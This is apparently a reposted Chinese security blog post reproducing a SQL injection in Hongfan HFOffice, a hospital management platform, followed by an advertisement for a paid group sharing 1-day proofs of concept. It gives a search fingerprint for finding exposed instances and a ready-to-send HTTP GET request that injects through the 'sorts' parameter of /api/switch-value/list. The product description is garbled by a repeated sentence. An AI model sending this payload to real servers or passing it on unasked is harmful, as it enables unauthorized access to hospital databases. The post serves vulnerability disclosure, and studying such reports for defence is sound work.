【漏洞复现】红帆OA HFOffice SQL注入

admin 2024年2月15日19:07:00评论39 views字数 924阅读3分4秒阅读模式
免责声明  由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

【漏洞复现】红帆OA HFOffice SQL注入

| 0x01 产品介绍

    红帆HFOffice是广州红帆科技有限公司研发的新一代医院智慧管理云平台,它采用了一系列红帆HFOffice是广州红帆科技有限公司研发的新一代医院智慧管理云平台

| 0x02 影响产品

红帆 HFOffice

| 0x03 语法特征

title:"HFOffice"

【漏洞复现】红帆OA HFOffice SQL注入

| 0x04 漏洞复现

页面

【漏洞复现】红帆OA HFOffice SQL注入

POC

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-user%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25Accept-Encoding: gzip, deflateAccept: */*Connection: close

【漏洞复现】红帆OA HFOffice SQL注入

| 知识星球的介绍

不好意思,兄弟们,这里给湘安无事星球打个广告,不喜欢的可以直接滑走哦。

1.群主为什么要建知识星球?

很简单为了恰饭哈哈哈,然后也是为了建立一个圈子进行交流学习和共享资源嘛相应的也收取费用嘛,毕竟维持星球也需要精力

2.知识星球有哪些资源?

群里面联系群主是可以要一些免费的学习资料的,因为群里面大部分是大学生嘛大学生不就是喜欢白嫖,所以大家会共享一些资料没有的群主wk也有,wk除了不会pc,其他都能嫖hhh

一些实战报告,截的部分

【漏洞复现】红帆OA HFOffice SQL注入

【漏洞复现】红帆OA HFOffice SQL注入

【漏洞复现】红帆OA HFOffice SQL注入

一些1day的poc,这些也就是信息差,不想找可以让wk帮你们嫖,群主也会经常发

【漏洞复现】红帆OA HFOffice SQL注入

【漏洞复现】红帆OA HFOffice SQL注入

【漏洞复现】红帆OA HFOffice SQL注入

一些共享的资源

1.刀客源码的会员2.fofa 360高级会员3.专属漏洞库5.专属内部it免费课程6.不定期直播分享(星球有录屏)

技术交流可加下方wx

【漏洞复现】红帆OA HFOffice SQL注入

【漏洞复现】红帆OA HFOffice SQL注入

【漏洞复现】红帆OA HFOffice SQL注入

【漏洞复现】红帆OA HFOffice SQL注入

原文始发于微信公众号(WK安全):【漏洞复现】红帆OA HFOffice SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日19:07:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】红帆OA HFOffice SQL注入https://cn-sec.com/archives/2179010.html

发表评论

匿名网友 填写信息